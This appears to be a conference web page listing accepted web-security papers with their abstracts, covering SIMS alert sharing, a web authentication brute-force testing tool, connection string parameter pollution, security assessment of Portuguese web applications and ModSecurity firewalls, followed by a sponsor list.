Information

Accepted Papers


A semantic web approach to share alerts among Security Information Management Systems
Jorge E. López de Vergara, Víctor A. Villagrá, Pilar Holgado, Elena de Frutos, Iván Sanz

This paper presents a semantic web-based architecture to share alerts among Security Information Management Systems (SIMS). Such architecture is useful if two or more SIMS from different domains need to know information about alerts happening in the other domains, which is useful for an early response to network incidents. For this, an ontology has been defined to describe the knowledge base of each SIMS that contains the security alerts. These knowledge bases can be queried from other SIMS, using standard semantic web protocols. Two modules have been implemented: one to insert the new security alerts in the knowledge base, and another one to query such knowledge bases. The performance of both modules has been evaluated, providing some results.

[link to presentation]

WASAT - A New Web Authorization Security Analysis Tool
Carmen Torrano-Gimenez , Alejandro Perez-Villegas and Gonzalo Alvarez

WASAT (Web Authentication Security Analysis Tool) is an intuitive and complete application designed for the assessment of the security of different web related authentication schemes, namely Basic Authentication and Forms-Based Authentication. WASAT is able to mount dictionary and brute force attacks of variable complexity against the target web site. Password files incorporate a syntax to generate different password search spaces. An important feature of this tool is that low-signature attacks can be performed in order to avoid detection by anti-brute-force mechanisms. This tool is platform-independent and multithreading too, allowing the user to take control of the program speed. WASAT provides some features not included in many of the existing similar applications and hardly any of their drawbacks, making this tool an excellent one for security analysis.

[link to presentation]

Connection String Parameter Pollution Attacks
Chema Alonso, Manuel Fernandez, Alejandro Martín and Antonio Guzmán

In 2007 the classification of the ten most critical vulnerabilities for the security of a system establishes that code injection attacks are the second type of attack behind XSS attacks. Currently the code injection attacks are placed first in this ranking. In fact Most critical attacks are those that combine XSS techniques to access systems and code injection techniques to access the information.. The potential damage associated with this type of threats, the total absence of background and the fact that the solution to mitigate this vulnerability must be implemented by systems administrators and the database vendors justify an in-depth analysis to estimate all the possible ways of implementation of this attack technique.

[link to presentation]


Web Applications Security Assessment in the Portuguese World Wide Web panorama
Nuno Teodoro, Carlos Serrão

Following the EU Information and Communication Technologies agenda, the Portuguese Government has started the creation of many applications, enabling electronic interaction between individuals, companies and the public administration – the e-Government. Due to the Internet open nature and the sensitivity of the data that those applications have to handle, it is important to ensure and assess their security. Financial institutions, such as banks, that nowadays use the WWW as a communication channel with their customers, face the same challenges.
The main objective of this paper is to introduce a work that will be performed to assess the security of the financial and public administration sectors web applications. In this paper the authors provide a description of the rationale behind this work that involves the selection of a set of key financial and public administration web applications, the definition and application of a security assessment methodology, and the evaluation the assessment results.


[link to presentation]

Building web application firewalls in high availability environments
Juan Galiana Lara, Àngel Puigventós Gracia

Every day increases the number of Web applications and Web services due to migration that is occurring in this type of environments. In these scenarios, it is very common to find all types of vulnerabilities affecting web applications and traditional methods of protection at the network and transport level, not enough to mitigate them. What is more, there are also situations where the availability of information systems is vital for proper functioning. To protect our systems from these threats, we need a component acting on the layer 7 of the OSI model, which includes the HTTP protocol that allows us to analyze traffic and HTTPS that is easily scalable. To solve these problems, the paper presents the design and implementation of an Open Source application firewall, ModSecurity, emphasizing the use of the positive security model, and the deployment of high availability environments.

[link to presentation]
Sponsors
Pasted Graphic
isc2
www.euitt.upm.es
Media Sponsors
logo_redseguridad
INSECURE-web
Supported by:
FORTIFY_LOGO_MED
gothamlogo
logo_chapter
ATI2
syngress
MiguelAlmeida.LOGO.210x90
banner_j4m_ger